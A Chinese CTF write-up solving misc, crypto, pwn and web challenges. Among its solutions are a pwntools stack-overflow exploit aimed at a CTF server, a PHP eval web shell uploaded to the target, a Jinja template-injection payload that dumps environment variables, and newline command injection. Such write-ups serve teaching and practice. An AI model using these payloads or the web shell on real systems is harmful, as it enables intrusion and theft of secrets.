MISC
1、Interesting_web
题解:
(1)打开网站发现四张dif图片快速闪;下载下来使用工具分祯查看得到flag
2、Hidden_Evidence
题解:
(1)访问⽹站,F12,发现JPG⽂件,下载,010编辑器加载,头部发现:Flag: c2VjcmV0X3NlY3JldA==
转Base64
3、⽹络迷踪
题解:
(1)简单的社工;下载图⽚,发现I GZ,⼴州缩写;图⽚扔给百度,发现⼩红书⼀篇⽂章,关键词:98层酒店
直接关键词百度找到⼴州四季酒店
flag{⼴东省-⼴州市-天河区-珠江新城珠江西路-5号}
Crypto
1、xor_index_cipher
题解:
(1)明⽂与key逐⼀异或,然后加上序号,再对256取模,把加密代码扔给deepseek,⾃动⽣成解密代码
2、RSA
题解:
(1)预期解:p和q 很接近;直接对n方开跟求下一个素数就是p
(2)非预期解:N可以直接分解
3、破解数据流
题解:
(1)给出了加密代码;很简单的LCG;发现与key异或(4个字节4个字节异或);直接nc连接;发送密文让去和key异或得到明文;最后hex转字符结束
PWN
1、easy_pwn_2
题解:
(1)flag直接放你脸上了;IDA打开就可以
2、calculator
题解:
(1)首先checksec;发现没开canart和PIE;应该栈溢出
发现后⾯函数secret_backdoor,会打印出flag
calculate函数存在栈溢出
所以直接栈溢出跳到后⻔函数就可以拿到flag
from pwn import *
context(log_level="debug", arch="i386", os="linux")
# p = process("./vuln")
p = remote("ctf.2v8.cn",20710)
pay = b"a"*(0x48+0x4)
backdoor = 0x080491C6
payload = pay + p32(backdoor)
p.sendline(payload)
p.interactive()
WEB
1、upload-difficult
题解:
(1)很弱智的一个文件上传;直接上传马子访问phpinfo;得到flag
:<?php eval($_REQUEST['cmd']); ?>
2、template_injection
题解:
(1)首先尝试工具梭哈发现没绕过waf;题目提示个lipsum.globals;发现过滤了() 和[];但是os模块可以利用;直接查看环境变量得到flag
{{lipsum.__globals__.os.environ}}
3、ping_server
题解:
(1)⼀眼命令注⼊,尝试&&、||、;等均⽆法绕过,试下换⾏,发现可⾏;cat+/flag发现找不到⽂件,猜测在环境变量⾥,env拿到flag